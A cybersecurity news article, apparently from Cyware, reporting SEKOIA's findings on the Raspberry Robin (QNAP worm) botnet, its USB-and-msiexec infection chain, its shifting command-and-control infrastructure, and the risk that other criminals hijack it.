Go to listing page

Other Hackers can Repurpose Raspberry Robin Botnet's Infrastructure

Other Hackers can Repurpose Raspberry Robin Botnet's Infrastructure
Raspberry Robin, the cunning worm that emerged in September 2021, has been constantly evolving, adding new tricks to its arsenal. Recent findings have exposed that the botnet's attack infrastructure is highly adaptable, and can be hijacked by other cybercriminals, turning it into a super-threat. 

The malware, also known as QNAP worm, is the brainchild of the notorious hacker group DEV-0856 and is primarily used to target finance, government, insurance, and telecom organizations.

Diving into details

SEKOIA discovered at least eight virtual private servers hosted on Linode that function as a secondary command and control (C2) layer, potentially acting as forward proxies to an undetermined next level.
  • When a USB drive is inserted and a Windows shortcut (.LNK) file is launched, the msiexec utility is activated, downloading the main obfuscated Raspberry Robin payload from the QNAP instance.
  • The use of msiexec to send out HTTP requests to fetch the malware renders it susceptible to hijacking these requests to download another rogue MSI payload, via DNS hijacking attacks or by buying expired known domains.
  • Researchers discovered over 270 domain names utilized by this intrusion set, which have been active since the creation of the botnet in July 2021 and were still in use by the end of 2022.

Why this matters

  • Raspberry Robin's infrastructure domain resolutions change frequently, moving from one compromised QNAP to another.
  • New resolutions occur daily, resulting in new compromised QNAPs being added.
  • This constant change makes it challenging for operators to effectively track or neutralize it through sinkholing or tapping methods.
  • SEKOIA.IO analysts suspect that Raspberry Robin will remain active, even after domain names expire, as thousands of USB thumb drives have been compromised by it.
  • This could potentially lead to a second life for the botnet, as other cybercriminals may take advantage of the existing infrastructure.

That’s not all!

  • Earlier this month, researchers discovered a highly-obfuscated Raspberry Robin variant targeting financial and insurance services in Europe. 
  • The malware protection mechanism in this variant has at least five layers before the actual malicious code is executed. 
  • In December 2022, the malware was observed implementing new detection evasion methods by hiding behind multiple obfuscation layers and a fake payload. 
  • Between October and November, 2022, QNAP worm targeted government and telecom entities in Australia, Mexico, India, Argentina, Croatia, Brazil, Italy, Colombia, and France. 

The bottom line

Botnets are versatile and can be repurposed and/or modified by their operators or taken over by other groups over time. The precise origins of the initial spread of Raspberry Robin via USB infections are currently uncertain, though it is suspected that it may have relied on other malware for dissemination. It is important to continuously monitor, investigate, and reassess this threat in order to provide actionable cyber threat intelligence.
Cyware Publisher

Publisher

Cyware